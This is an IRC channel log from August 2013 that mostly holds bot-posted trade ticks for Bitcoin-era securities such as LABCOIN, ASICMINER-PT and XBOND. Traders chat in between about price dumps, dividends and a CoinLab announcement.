[BTCTC] [LABCOIN] 100 @ 0.00125 = 0.125 BTC [-] Aug 07 19:04:25 [BTCTC] [LABCOIN] 37 @ 0.001235 = 0.0457 BTC [-] Aug 07 19:04:27 [BTCTC] [LABCOIN] 300 @ 0.001234 = 0.3702 BTC [-] Aug 07 19:04:29 [BTCTC] [LABCOIN] 59 @ 0.001227 = 0.0724 BTC [-] Aug 07 19:04:31 [BTCTC] [LABCOIN] 125 @ 0.001226 = 0.1533 BTC [-] Aug 07 19:04:33 [BTCTC] [LABCOIN] 350 @ 0.001226 = 0.4291 BTC [-] Aug 07 19:04:35 [BTCTC] [LABCOIN] 66 @ 0.001224 = 0.0808 BTC [-] Aug 07 19:04:37 [BTCTC] [LABCOIN] 104 @ 0.001224 = 0.1273 BTC [-] Aug 07 19:04:39 [BTCTC] [LABCOIN] 1300 @ 0.001223 = 1.5899 BTC [-] Aug 07 19:04:42 [BTCTC] [LABCOIN] 600 @ 0.001223 = 0.7338 BTC [-] Aug 07 19:04:45 [BTCTC] [LABCOIN] 1800 @ 0.001222 = 2.1996 BTC [-] Aug 07 19:04:48 [BTCTC] [LABCOIN] 5000 @ 0.001222 = 6.11 BTC [-] Aug 07 19:04:52 frb: soon, soon Aug 07 19:04:53 [BTCTC] [LABCOIN] 10301 @ 0.001221 = 12.5775 BTC [-] Aug 07 19:05:12 [BTCTC] [DMS.MINING] 36 @ 0.006271 = 0.2258 BTC [-] Aug 07 19:05:19 [BTCTC] [DMS.MINING] 40 @ 0.006271 = 0.2508 BTC [-] Aug 07 19:05:22 [BTCTC] [DMS.MINING] 185 @ 0.006264 = 1.1588 BTC [-] Aug 07 19:05:24 [BTCTC] [DMS.MINING] 10 @ 0.0061 = 0.061 BTC [-] Aug 07 19:05:26 [BTCTC] [DMS.MINING] 100 @ 0.0061 = 0.61 BTC [-] Aug 07 19:05:28 [BTCTC] [DMS.MINING] 14 @ 0.006 = 0.084 BTC [-] Aug 07 19:05:30 [BTCTC] [DMS.MINING] 50 @ 0.006 = 0.3 BTC [-] Aug 07 19:05:32 [BTCTC] [DMS.MINING] 25 @ 0.006 = 0.15 BTC [-] Aug 07 19:05:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.03795 BTC [-] Aug 07 19:06:16 it should be below Aug 07 19:06:29 [BTCTC] [LABCOIN] 235 @ 0.001228 = 0.2886 BTC [+] Aug 07 19:06:30 [BTCTC] [LABCOIN] 2 @ 0.001227 = 0.0025 BTC [-] Aug 07 19:06:32 [BTCTC] [LABCOIN] 100 @ 0.001226 = 0.1226 BTC [-] Aug 07 19:06:33 i agree pankkake Aug 07 19:06:34 [BTCTC] [LABCOIN] 89 @ 0.001224 = 0.1089 BTC [-] Aug 07 19:06:37 [BTCTC] [LABCOIN] 584 @ 0.001223 = 0.7142 BTC [-] Aug 07 19:06:39 [BTCTC] [LABCOIN] 1184 @ 0.001222 = 1.4468 BTC [-] Aug 07 19:06:42 [BTCTC] [LABCOIN] 1676 @ 0.001221 = 2.0464 BTC [-] Aug 07 19:06:44 [BTCTC] [LABCOIN] 1 @ 0.00121 BTC [-] Aug 07 19:06:47 [BTCTC] [LABCOIN] 350 @ 0.001202 = 0.4207 BTC [-] Aug 07 19:06:48 classic pump and dump Aug 07 19:06:50 [BTCTC] [LABCOIN] 1000 @ 0.0012 = 1.2 BTC [-] Aug 07 19:06:55 [BTCTC] [LABCOIN] 1000 @ 0.0012 = 1.2 BTC [-] Aug 07 19:06:57 [BTCTC] [LABCOIN] 1000 @ 0.0012 = 1.2 BTC [-] Aug 07 19:07:02 [HAVELOCK] [LABCO] 1 @ 0.00177 BTC [+] Aug 07 19:07:13 [BTCTC] [LABCOIN] 10000 @ 0.0012 = 12 BTC [-] Aug 07 19:07:24 [BTCTC] [LABCOIN] 2000 @ 0.0012 = 2.4 BTC [-] Aug 07 19:07:26 [BTCTC] [LABCOIN] 1400 @ 0.0012 = 1.68 BTC [-] Aug 07 19:07:28 [BTCTC] [LABCOIN] 2250 @ 0.001189 = 2.6753 BTC [-] Aug 07 19:07:29 after the dumping is done, maybe we'll see an AM pump Aug 07 19:07:40 [BTCTC] [LABCOIN] 900 @ 0.001177 = 1.0593 BTC [-] Aug 07 19:07:40 could be :) Aug 07 19:07:45 [BTCTC] [LABCOIN] 2000 @ 0.001172 = 2.344 BTC [-] Aug 07 19:07:47 [BTCTC] [LABCOIN] 500 @ 0.001151 = 0.5755 BTC [-] Aug 07 19:07:48 [BTCTC] [LABCOIN] 50 @ 0.00115 = 0.0575 BTC [-] Aug 07 19:07:49 dump labcoins, dump gardencoins, buy amcoins Aug 07 19:07:50 [BTCTC] [LABCOIN] 62 @ 0.001135 = 0.0704 BTC [-] Aug 07 19:07:51 [BTCTC] [LABCOIN] 3491 @ 0.001135 = 3.9623 BTC [-] Aug 07 19:08:01 it is div day after all Aug 07 19:08:04 [BTCTC] [LABCOIN] 7 @ 0.001393 = 0.0098 BTC [+] Aug 07 19:08:11 it's not like labcoin was worth anything to begin with... Aug 07 19:08:17 indeed Aug 07 19:08:36 [BTCTC] [BTCGARDEN] 28 @ 0.01573 = 0.4404 BTC [-] Aug 07 19:08:41 [BTCTC] [BTCGARDEN] 172 @ 0.01571 = 2.7021 BTC [-] Aug 07 19:09:00 [HAVELOCK] [AM100] 10 @ 0.0367 = 0.367 BTC [-] Aug 07 19:09:03 [HAVELOCK] [AM100] 3 @ 0.0367 = 0.1101 BTC [-] Aug 07 19:09:24 i've been taking steady loss on asicminer-pt, should i dump it? Aug 07 19:09:37 [BTCTC] [ACTIVEMINING] 31 @ 0.005451 = 0.169 BTC [-] Aug 07 19:09:46 Guest73018: up to you :) Aug 07 19:10:18 [HAVELOCK] [XBOND] 96 @ 0.001028 = 0.0987 BTC [+] Aug 07 19:10:28 [BTCTC] [LABCOIN] 1 @ 0.001343 BTC [-] Aug 07 19:11:08 you take a loss when you dump it, not when the price moves Aug 07 19:11:19 ^ Aug 07 19:11:30 my only problem is i end up gambling with my dividends every week Aug 07 19:11:33 [BTCTC] [ACTIVEMINING] 50 @ 0.005401 = 0.2701 BTC [-] Aug 07 19:11:34 ;) Aug 07 19:11:37 lol Aug 07 19:11:45 [BTCTC] [LABCOIN] 235 @ 0.001332 = 0.313 BTC [-] Aug 07 19:11:46 [BTCTC] [LABCOIN] 100 @ 0.001333 = 0.1333 BTC [+] Aug 07 19:11:49 Inexperienced? Buy some BTC-BOND. Aug 07 19:11:57 that hints that it's unlikely to be your only problem Aug 07 19:12:06 ThickAsThieves: :D Aug 07 19:12:07 i like Namworld's strat. Aug 07 19:12:12 [BTCTC] [LABCOIN] 147 @ 0.001336 = 0.1964 BTC [+] Aug 07 19:12:14 Wanna be cool? Buy XBOND. Aug 07 19:12:18 :P Aug 07 19:12:31 Xbond is actually one my more wiser choices recently lol Aug 07 19:12:37 one of* Aug 07 19:12:38 X is definitevely cooler than BTC- Aug 07 19:12:38 thickasthieves you lied to me. you told me to wait till it was 0.01 to buy xbond cuz it wasn't going up, sure enough ti went up Aug 07 19:12:41 [BTCTC] [LABCOIN] 200 @ 0.001329 = 0.2658 BTC [-] Aug 07 19:12:56 surely that's not how it happened Aug 07 19:13:02 scamsurely. Aug 07 19:13:03 [BTCTC] [LABCOIN] 50 @ 0.001223 = 0.0612 BTC [-] Aug 07 19:13:04 [BTCTC] [LABCOIN] 11 @ 0.001222 = 0.0134 BTC [-] Aug 07 19:13:21 [BTCTC] [LABCOIN] 13 @ 0.001323 = 0.0172 BTC [+] Aug 07 19:13:58 more xbonds will be released someday Aug 07 19:14:09 [BTCTC] [LABCOIN] 50 @ 0.00132 = 0.066 BTC [-] Aug 07 19:14:11 [BTCTC] [LABCOIN] 50 @ 0.00132 = 0.066 BTC [-] Aug 07 19:14:15 i suspected theyd trade above face value Aug 07 19:14:33 [BTCTC] [ACTIVEMINING] 10 @ 0.005546 = 0.0555 BTC [+] Aug 07 19:14:35 at least they are under callback value now Aug 07 19:14:36 anybody bought bitcoins with canadianbitcoins? wondering if a 'merican can get them and what the fees work out to... 100.40/ is a considerable difference in price if so Aug 07 19:15:11 aren't they requiring usd to canada dollar exchange Aug 07 19:15:21 [BTCTC] [LABCOIN] 50 @ 0.001301 = 0.0651 BTC [-] Aug 07 19:15:26 they have a channel Aug 07 19:15:36 #canadianbitcoins Aug 07 19:15:44 thankya TAT Aug 07 19:15:45 also I think topace runs it Aug 07 19:15:52 so you can pm him Aug 07 19:16:12 [BTCTC] [LABCOIN] 50 @ 0.001301 = 0.0651 BTC [-] Aug 07 19:16:27 [BTCTC] [DMS.SELLING] 2 @ 0.02289 = 0.0458 BTC [-] Aug 07 19:16:42 [BTCTC] [ACTIVEMINING] 1 @ 0.00554 BTC [-] Aug 07 19:16:43 [BTCTC] [LABCOIN] 50 @ 0.001301 = 0.0651 BTC [-] Aug 07 19:17:20 i'm thinking about putting more money in XBOND if you are releasing more shares they will go for the current value ya? Aug 07 19:18:19 the most likely scenario is that the next mentionable amount of XBONDS released will be after our next eligible Pre-IPO offering Aug 07 19:18:28 [BTCTC] [ASICMINER-PT] 1 @ 3.885 BTC [+] Aug 07 19:18:31 at that time it is likely we'll get many XBONDS redeemed Aug 07 19:18:41 [BTCTC] [LABCOIN] 1 @ 0.0013 BTC [-] Aug 07 19:18:45 and thus be ready to re-issue afterward Aug 07 19:19:23 however, there are other things that could instigate further releases Aug 07 19:19:35 right now we have the money we need though Aug 07 19:19:44 [BTCTC] [LABCOIN] 235 @ 0.001251 = 0.294 BTC [-] Aug 07 19:19:45 [BTCTC] [LABCOIN] 16 @ 0.00125 = 0.02 BTC [-] Aug 07 19:19:47 [BTCTC] [LABCOIN] 100 @ 0.00123 = 0.123 BTC [-] Aug 07 19:19:48 [BTCTC] [LABCOIN] 50 @ 0.001227 = 0.0614 BTC [-] Aug 07 19:19:49 [BTCTC] [LABCOIN] 10 @ 0.001222 = 0.0122 BTC [-] Aug 07 19:19:50 [BTCTC] [LABCOIN] 80 @ 0.00122 = 0.0976 BTC [-] Aug 07 19:19:50 [BTCTC] [LABCOIN] 20 @ 0.001208 = 0.0242 BTC [-] Aug 07 19:19:52 [BTCTC] [LABCOIN] 2 @ 0.00116 = 0.0023 BTC [-] Aug 07 19:19:53 [BTCTC] [LABCOIN] 1000 @ 0.001156 = 1.156 BTC [-] Aug 07 19:19:54 [BTCTC] [LABCOIN] 500 @ 0.001155 = 0.5775 BTC [-] Aug 07 19:19:55 [BTCTC] [LABCOIN] 1509 @ 0.001135 = 1.7127 BTC [-] Aug 07 19:19:56 [BTCTC] [LABCOIN] 1000 @ 0.001132 = 1.132 BTC [-] Aug 07 19:19:58 [BTCTC] [LABCOIN] 200 @ 0.001131 = 0.2262 BTC [-] Aug 07 19:19:59 [BTCTC] [LABCOIN] 1000 @ 0.001131 = 1.131 BTC [-] Aug 07 19:20:00 [BTCTC] [LABCOIN] 170 @ 0.001107 = 0.1882 BTC [-] Aug 07 19:20:01 [BTCTC] [LABCOIN] 150 @ 0.001105 = 0.1658 BTC [-] Aug 07 19:20:02 [BTCTC] [LABCOIN] 1000 @ 0.001104 = 1.104 BTC [-] Aug 07 19:20:03 [BTCTC] [LABCOIN] 89 @ 0.001103 = 0.0982 BTC [-] Aug 07 19:20:04 [BTCTC] [LABCOIN] 2000 @ 0.001102 = 2.204 BTC [-] Aug 07 19:20:05 [BTCTC] [LABCOIN] 9869 @ 0.0011 = 10.8559 BTC [-] Aug 07 19:20:55 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.002299 = 0.0276 BTC [+] Aug 07 19:22:05 [BTCTC] [LABCOIN] 50 @ 0.001258 = 0.0629 BTC [+] Aug 07 19:22:07 [BTCTC] [LABCOIN] 235 @ 0.001257 = 0.2954 BTC [-] Aug 07 19:23:12 damn labcoin Aug 07 19:23:22 just another dump Aug 07 19:23:35 oh certainly Aug 07 19:23:42 [BTCTC] [LABCOIN] 50 @ 0.001128 = 0.0564 BTC [-] Aug 07 19:23:45 just the morning labcoin poop Aug 07 19:24:12 [BTCTC] [LABCOIN] 50 @ 0.001127 = 0.0564 BTC [-] Aug 07 19:24:14 [BTCTC] [LABCOIN] 185 @ 0.001128 = 0.2087 BTC [+] Aug 07 19:24:26 [BTCTC] [LABCOIN] 50 @ 0.001129 = 0.0565 BTC [+] Aug 07 19:24:26 [BTCTC] [LABCOIN] 186 @ 0.001129 = 0.21 BTC [+] Aug 07 19:24:36 [BTCTC] [LABCOIN] 35 @ 0.001128 = 0.0395 BTC [-] Aug 07 19:24:37 [BTCTC] [LABCOIN] 49 @ 0.001129 = 0.0553 BTC [+] Aug 07 19:24:56 [BTCTC] [BTCGARDEN] 28 @ 0.01573 = 0.4404 BTC [+] Aug 07 19:24:57 [BTCTC] [BTCGARDEN] 45 @ 0.01572 = 0.7074 BTC [-] Aug 07 19:25:03 wish i had some liquid coinage Aug 07 19:25:19 [BTCTC] [DMS.MINING] 1 @ 0.006558 BTC [+] Aug 07 19:25:22 so you could do what Aug 07 19:26:29 [BTCTC] [LABCOIN] 1 @ 0.00128 BTC [+] Aug 07 19:28:11 [BTCTC] [LABCOIN] 50 @ 0.001261 = 0.0631 BTC [-] Aug 07 19:28:37 [BTCTC] [LABCOIN] 50 @ 0.001261 = 0.0631 BTC [-] Aug 07 19:29:10 [BTCTC] [LABCOIN] 50 @ 0.001261 = 0.0631 BTC [-] Aug 07 19:29:45 [BTCTC] [LABCOIN] 50 @ 0.001261 = 0.0631 BTC [-] Aug 07 19:29:51 [BTCTC] [LABCOIN] 1 @ 0.00126 BTC [-] Aug 07 19:30:00 [BTCTC] [LABCOIN] 110 @ 0.001135 = 0.1249 BTC [-] Aug 07 19:30:02 [BTCTC] [LABCOIN] 50 @ 0.001133 = 0.0567 BTC [-] Aug 07 19:30:03 [BTCTC] [LABCOIN] 4 @ 0.001132 = 0.0045 BTC [-] Aug 07 19:30:03 Aug 7, 2013, SEATTLE, WA — CoinLab, the first venture-funded Bitcoin company, announced that it will be launching additional Bitcoin businesses by the end of 2013, kicking off with the first enterprise-scale Bitcoin mining company in the U.S., Alydian. Aug 07 19:30:14 [BTCTC] [LABCOIN] 5000 @ 0.00113 = 5.65 BTC [-] Aug 07 19:30:16 [BTCTC] [LABCOIN] 35 @ 0.001128 = 0.0395 BTC [-] Aug 07 19:30:17 [BTCTC] [LABCOIN] 10000 @ 0.001111 = 11.11 BTC [-] Aug 07 19:30:18 [BTCTC] [LABCOIN] 450 @ 0.00111 = 0.4995 BTC [-] Aug 07 19:30:20 [BTCTC] [LABCOIN] 8100 @ 0.001109 = 8.9829 BTC [-] Aug 07 19:30:21 [BTCTC] [LABCOIN] 14585 @ 0.001108 = 16.1602 BTC [-] Aug 07 19:30:54 [BTCTC] [LABCOIN] 1 @ 0.001136 BTC [+] Aug 07 19:32:25 going for strike 3? pool wasnt succesful exchange thing is a lawsuit... Aug 07 19:32:57 good ol' coinlab always wanting the spotlight Aug 07 19:33:02 next they will buy BTCT Aug 07 19:33:05 [BTCTC] [CRYPTO-TRADE] 7 @ 0.194 = 1.358 BTC [-] Aug 07 19:33:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.194 BTC [-] Aug 07 19:33:08 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1936 = 0.7744 BTC [-] Aug 07 19:33:20 well, they have near inifnitiez monies, they can fuck around Aug 07 19:33:41 yeah, until the 3rd strike, they're still not out. Aug 07 19:34:09 I wish BTCT.co wasn't that slow. Aug 07 19:35:00 seems snappier lately Aug 07 19:35:54 [BTCTC] [LABCOIN] 2 @ 0.001254 = 0.0025 BTC [+] Aug 07 19:36:37 [BTCTC] [BTCGARDEN] 5 @ 0.01572 = 0.0786 BTC [-] Aug 07 19:36:38 [BTCTC] [BTCGARDEN] 228 @ 0.01571 = 3.5819 BTC [-] Aug 07 19:36:40 [BTCTC] [BTCGARDEN] 100 @ 0.01571 = 1.571 BTC [-] Aug 07 19:36:41 [BTCTC] [BTCGARDEN] 25 @ 0.0157 = 0.3925 BTC [-] Aug 07 19:36:42 [BTCTC] [BTCGARDEN] 628 @ 0.01561 = 9.8031 BTC [-] Aug 07 19:37:57 [BTCTC] [ASICMINER-PT] 1 @ 3.88 BTC [-] Aug 07 19:37:59 [BTCTC] [ASICMINER-PT] 1 @ 3.887 BTC [+] Aug 07 19:37:59 [BTCTC] [ASICMINER-PT] 1 @ 3.888 BTC [+] Aug 07 19:38:00 [BTCTC] [ASICMINER-PT] 3 @ 3.889 = 11.667 BTC [+] Aug 07 19:38:01 [BTCTC] [ASICMINER-PT] 2 @ 3.89 = 7.78 BTC [+] Aug 07 19:38:12 labcoin seems to be taking an unrealistic beating, are they themselves dumping to make a panic ? Aug 07 19:39:21 how is that unrealistic for a bag of air Aug 07 19:39:27 [HAVELOCK] [AM100] 1 @ 0.039 BTC [+] Aug 07 19:39:31 rofl'd Aug 07 19:39:45 [HAVELOCK] [AM100] 1 @ 0.0391 BTC [+] Aug 07 19:43:12 [BTCTC] [NASTY-PT] 69 @ 0.003612 = 0.2492 BTC [-] Aug 07 19:43:14 [BTCTC] [NASTY-PT] 131 @ 0.003601 = 0.4717 BTC [-] Aug 07 19:43:25 [BTCTC] [LABCOIN] 50 @ 0.001226 = 0.0613 BTC [-] Aug 07 19:43:27 [BTCTC] [LABCOIN] 195 @ 0.001227 = 0.2393 BTC [+] Aug 07 19:44:05 [BTCTC] [LABCOIN] 50 @ 0.001228 = 0.0614 BTC [+] Aug 07 19:44:07 [BTCTC] [LABCOIN] 6 @ 0.001229 = 0.0074 BTC [+] Aug 07 19:44:08 [BTCTC] [LABCOIN] 24 @ 0.00123 = 0.0295 BTC [+] Aug 07 19:44:08 [BTCTC] [LABCOIN] 2 @ 0.001257 = 0.0025 BTC [+] Aug 07 19:44:09 [BTCTC] [LABCOIN] 168 @ 0.001278 = 0.2147 BTC [+] Aug 07 19:44:26 [BTCTC] [BASIC-MINING] 1 @ 0.3732 BTC [+] Aug 07 19:44:39 [HAVELOCK] [AM100] 1 @ 0.0391 BTC [+] Aug 07 19:44:53 [BTCTC] [LABCOIN] 50 @ 0.001275 = 0.0638 BTC [-] Aug 07 19:44:54 [BTCTC] [LABCOIN] 6 @ 0.001276 = 0.0077 BTC [+] Aug 07 19:44:55 [BTCTC] [LABCOIN] 56 @ 0.001278 = 0.0716 BTC [+] Aug 07 19:44:57 [BTCTC] [LABCOIN] 1799 @ 0.001279 = 2.3009 BTC [+] Aug 07 19:44:58 [BTCTC] [LABCOIN] 6 @ 0.001288 = 0.0077 BTC [+] Aug 07 19:44:59 [BTCTC] [LABCOIN] 50 @ 0.001289 = 0.0645 BTC [+] Aug 07 19:44:59 [BTCTC] [LABCOIN] 2 @ 0.001293 = 0.0026 BTC [+] Aug 07 19:45:00 [BTCTC] [LABCOIN] 20 @ 0.001294 = 0.0259 BTC [+] Aug 07 19:45:01 [BTCTC] [LABCOIN] 1262 @ 0.001297 = 1.6368 BTC [+] Aug 07 19:45:55 [MPEX] [S.MPOE] 3760 @ 0.00083042 = 3.1224 BTC [-] Aug 07 19:45:57 [MPEX] [S.MPOE] 6707 @ 0.00083515 = 5.6014 BTC [+] Aug 07 19:45:58 [MPEX] [S.MPOE] 4185 @ 0.00083779 = 3.5062 BTC [+] Aug 07 19:46:00 [MPEX] [S.MPOE] 348 @ 0.00085 = 0.2958 BTC [+] Aug 07 19:46:23 [HAVELOCK] [XBOND] 10 @ 0.001029 = 0.0103 BTC [+] Aug 07 19:47:11 [BTCTC] [LABCOIN] 50 @ 0.001295 = 0.0648 BTC [-] Aug 07 19:47:13 [BTCTC] [LABCOIN] 31 @ 0.001296 = 0.0402 BTC [+] Aug 07 19:47:13 [BTCTC] [LABCOIN] 100 @ 0.001297 = 0.1297 BTC [+] Aug 07 19:47:14 [BTCTC] [LABCOIN] 100 @ 0.001298 = 0.1298 BTC [+] Aug 07 19:47:15 [BTCTC] [LABCOIN] 1219 @ 0.001298 = 1.5823 BTC [+] Aug 07 19:49:56 [BTCTC] [DMS.MINING] 13 @ 0.006299 = 0.0819 BTC [-] Aug 07 19:50:29 [BTCTC] [LABCOIN] 50 @ 0.001295 = 0.0648 BTC [-] Aug 07 19:50:30 [BTCTC] [LABCOIN] 50 @ 0.001296 = 0.0648 BTC [+] Aug 07 19:50:32 [BTCTC] [LABCOIN] 100 @ 0.001298 = 0.1298 BTC [+] Aug 07 19:50:33 [BTCTC] [LABCOIN] 600 @ 0.001299 = 0.7794 BTC [+] Aug 07 19:50:46 [BTCTC] [DMS.MINING] 5 @ 0.006001 = 0.03 BTC [-] Aug 07 19:50:53 [BTCTC] [ASICMINER-PT] 1 @ 3.891 BTC [+] Aug 07 19:51:02 [BTCTC] [DMS.MINING] 1 @ 0.006001 BTC [-] Aug 07 19:51:19 [BTCTC] [LABCOIN] 50 @ 0.001293 = 0.0647 BTC [-] Aug 07 19:51:21 [BTCTC] [LABCOIN] 5 @ 0.001294 = 0.0065 BTC [+] Aug 07 19:51:22 [BTCTC] [LABCOIN] 625 @ 0.001298 = 0.8113 BTC [+] Aug 07 19:51:23 [BTCTC] [LABCOIN] 170 @ 0.001299 = 0.2208 BTC [+] Aug 07 19:51:38 [BTCTC] [ACTIVEMINING] 50 @ 0.005459 = 0.273 BTC [-] Aug 07 19:51:40 [BTCTC] [ACTIVEMINING] 35 @ 0.00546 = 0.1911 BTC [+] Aug 07 19:51:41 [BTCTC] [ACTIVEMINING] 309 @ 0.005465 = 1.6887 BTC [+] Aug 07 19:52:39 AM1 dividend for today will be 0.02457145 per share Aug 07 19:53:37 [HAVELOCK] [AM1] 1 @ 3.97999999 BTC [+] Aug 07 19:54:14 [BTCTC] [DMS.MINING] 1 @ 0.006 BTC [-] Aug 07 19:54:32 [HAVELOCK] [AM1] 1 @ 3.97999999 BTC [+] Aug 07 19:57:37 [BTCTC] [LABCOIN] 6 @ 0.001295 = 0.0078 BTC [-] Aug 07 19:57:37 [BTCTC] [LABCOIN] 100 @ 0.001296 = 0.1296 BTC [+] Aug 07 19:57:38 [BTCTC] [LABCOIN] 576 @ 0.001298 = 0.7476 BTC [+] Aug 07 19:58:19 [HAVELOCK] [XBOND] 8 @ 0.00102799 = 0.0082 BTC [-] Aug 07 19:58:33 [BTCTC] [LABCOIN] 5 @ 0.001295 = 0.0065 BTC [-] Aug 07 19:58:46 [BTCTC] [LABCOIN] 64 @ 0.001298 = 0.0831 BTC [+] Aug 07 19:59:40 [BTCTC] [LABCOIN] 120 @ 0.001294 = 0.1553 BTC [-] Aug 07 19:59:41 [BTCTC] [LABCOIN] 490 @ 0.001298 = 0.636 BTC [+] Aug 07 20:00:42 I need either a nice steak or a cheese burger Aug 07 20:00:47 Got a craving for beef Aug 07 20:01:11 [BTCTC] [ACTIVEMINING] 4 @ 0.005593 = 0.0224 BTC [+] Aug 07 20:02:14 [BTCTC] [TAT.MINIGAME] 49 @ 0.00023 = 0.0113 BTC [-] Aug 07 20:03:40 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 07 20:04:05 [HAVELOCK] [AM100] 1 @ 0.0391 BTC [+] Aug 07 20:04:49 [HAVELOCK] [XBOND] 12 @ 0.00102799 = 0.0123 BTC [-] Aug 07 20:06:07 [HAVELOCK] [SMG] 100 @ 0.0002387 = 0.0239 BTC [-] Aug 07 20:07:21 [HAVELOCK] [LABCO] 5 @ 0.00175999 = 0.0088 BTC [-] Aug 07 20:07:36 [HAVELOCK] [LABCO] 10 @ 0.00176 = 0.0176 BTC [+] Aug 07 20:09:11 [HAVELOCK] [SMG] 20 @ 0.0002387 = 0.0048 BTC [-] Aug 07 20:09:24 [HAVELOCK] [SMG] 20 @ 0.0002387 = 0.0048 BTC [-] Aug 07 20:10:00 [HAVELOCK] [SMG] 48 @ 0.0002387 = 0.0115 BTC [-] Aug 07 20:11:57 [BTCTC] [BTCGARDEN] 28 @ 0.01595 = 0.4466 BTC [+] Aug 07 20:11:58 [BTCTC] [BTCGARDEN] 14 @ 0.01596 = 0.2234 BTC [+] Aug 07 20:11:59 [BTCTC] [BTCGARDEN] 100 @ 0.01599 = 1.599 BTC [+] Aug 07 20:12:00 [BTCTC] [BTCGARDEN] 55 @ 0.016 = 0.88 BTC [+] Aug 07 20:12:01 [BTCTC] [BTCGARDEN] 1750 @ 0.016 = 28 BTC [+] Aug 07 20:12:13 [BTCTC] [LABCOIN] 5 @ 0.001296 = 0.0065 BTC [-] Aug 07 20:12:13 [BTCTC] [LABCOIN] 5 @ 0.001297 = 0.0065 BTC [+] Aug 07 20:12:14 [BTCTC] [LABCOIN] 80 @ 0.001297 = 0.1038 BTC [+] Aug 07 20:12:15 [BTCTC] [LABCOIN] 576 @ 0.001298 = 0.7476 BTC [+] Aug 07 20:14:13 [BTCTC] [DMS.MINING] 7 @ 0.00655 = 0.0459 BTC [+] Aug 07 20:14:47 [HAVELOCK] [LABCO] 3 @ 0.00175999 = 0.0053 BTC [-] Aug 07 20:16:08 [BTCTC] [LABCOIN] 576 @ 0.001298 = 0.7476 BTC [+] Aug 07 20:16:09 [BTCTC] [LABCOIN] 582 @ 0.001299 = 0.756 BTC [+] Aug 07 20:16:32 [HAVELOCK] [XBOND] 1 @ 0.001029 BTC [+] Aug 07 20:17:02 [BTCTC] [LABCOIN] 159 @ 0.001298 = 0.2064 BTC [-] Aug 07 20:17:03 [BTCTC] [LABCOIN] 8648 @ 0.001299 = 11.2338 BTC [+] Aug 07 20:19:30 [HAVELOCK] [XBOND] 28 @ 0.00102799 = 0.0288 BTC [-] Aug 07 20:19:55 [BTCTC] [DMS.PURCHASE] 60 @ 0.02828 = 1.6968 BTC [-] Aug 07 20:29:03 [BTCTC] [ACTIVEMINING] 50 @ 0.005503 = 0.2752 BTC [-] Aug 07 20:34:19 [BTCTC] [DMS.MINING] 2 @ 0.005751 = 0.0115 BTC [-] Aug 07 20:34:33 [BTCTC] [LABCOIN] 50 @ 0.001302 = 0.0651 BTC [+] Aug 07 20:34:35 [BTCTC] [LABCOIN] 150 @ 0.001301 = 0.1952 BTC [-] Aug 07 20:34:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.03746 = 0.1124 BTC [-] Aug 07 20:34:38 [BTCTC] [TAT.ASICMINER] 23 @ 0.03747 = 0.8618 BTC [+] Aug 07 20:35:55 [HAVELOCK] [AM100] 8 @ 0.0391 = 0.3128 BTC [+] Aug 07 20:35:58 [HAVELOCK] [AM100] 1 @ 0.03910001 BTC [+] Aug 07 20:36:00 [HAVELOCK] [AM100] 8 @ 0.0392 = 0.3136 BTC [+] Aug 07 20:38:58 [BTCTC] [ACTIVEMINING] 68 @ 0.005615 = 0.3818 BTC [+] Aug 07 20:38:59 [BTCTC] [ACTIVEMINING] 6 @ 0.005616 = 0.0337 BTC [+] Aug 07 20:38:59 [BTCTC] [ACTIVEMINING] 11 @ 0.005622 = 0.0618 BTC [+] Aug 07 20:39:00 [BTCTC] [ACTIVEMINING] 50 @ 0.005623 = 0.2812 BTC [+] Aug 07 20:39:02 [BTCTC] [ACTIVEMINING] 6 @ 0.005626 = 0.0338 BTC [+] Aug 07 20:39:14 [BTCTC] [DMS.PURCHASE] 1 @ 0.02828 BTC [-] Aug 07 20:42:41 [BTCTC] [LABCOIN] 12 @ 0.001286 = 0.0154 BTC [-] Aug 07 20:42:42 [BTCTC] [LABCOIN] 150 @ 0.001287 = 0.1931 BTC [+] Aug 07 20:42:44 [BTCTC] [LABCOIN] 50 @ 0.001288 = 0.0644 BTC [+] Aug 07 20:42:51 ;;bcstats Aug 07 20:42:53 Current Blocks: 250749 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1250 blocks | Next Difficulty In About: 6 days, 23 hours, 35 minutes, and 51 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 07 20:43:01 [BTCTC] [ACTIVEMINING] 450 @ 0.005793 = 2.6069 BTC [+] Aug 07 20:43:02 [BTCTC] [ACTIVEMINING] 220 @ 0.005794 = 1.2747 BTC [+] Aug 07 20:43:04 ;;nethash Aug 07 20:43:04 354416.891346 Aug 07 20:43:47 [BTCTC] [LABCOIN] 16 @ 0.001299 = 0.0208 BTC [+] Aug 07 20:43:49 [BTCTC] [LABCOIN] 184 @ 0.0013 = 0.2392 BTC [+] Aug 07 20:44:04 [BTCTC] [LABCOIN] 7853 @ 0.001288 = 10.1147 BTC [-] Aug 07 20:45:22 [HAVELOCK] [LABCO] 2 @ 0.00175999 = 0.0035 BTC [-] Aug 07 20:45:45 [HAVELOCK] [AM100] [PAID] 58.53514023 BTC to 250`761 shares, 23343 satoshi per share Aug 07 20:46:23 [HAVELOCK] [XBOND] 3 @ 0.001029 = 0.0031 BTC [+] Aug 07 20:47:10 All TATI ASICMINER PT divs have been paid or are scheduled to be paid within 15min Aug 07 20:47:55 [HAVELOCK] [AM1] [PAID] 16.65944310 BTC to 678 shares, 2457145 satoshi per share Aug 07 20:48:46 [HAVELOCK] [XBOND] 12 @ 0.001029 = 0.0123 BTC [+] Aug 07 20:49:10 [HAVELOCK] [AM100] 2 @ 0.0392 = 0.0784 BTC [+] Aug 07 20:49:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.03744 = 0.1123 BTC [-] Aug 07 20:49:31 [HAVELOCK] [AM100] 5 @ 0.03929988 = 0.1965 BTC [+] Aug 07 20:50:03 [HAVELOCK] [XBOND] 2 @ 0.001029 = 0.0021 BTC [+] Aug 07 20:50:13 [HAVELOCK] [AM100] 1 @ 0.03929988 BTC [+] Aug 07 20:50:40 [HAVELOCK] [AM100] 1 @ 0.0392 BTC [-] Aug 07 20:51:10 [HAVELOCK] [XBOND] 1 @ 0.001029 BTC [+] Aug 07 20:52:28 [BTCTC] 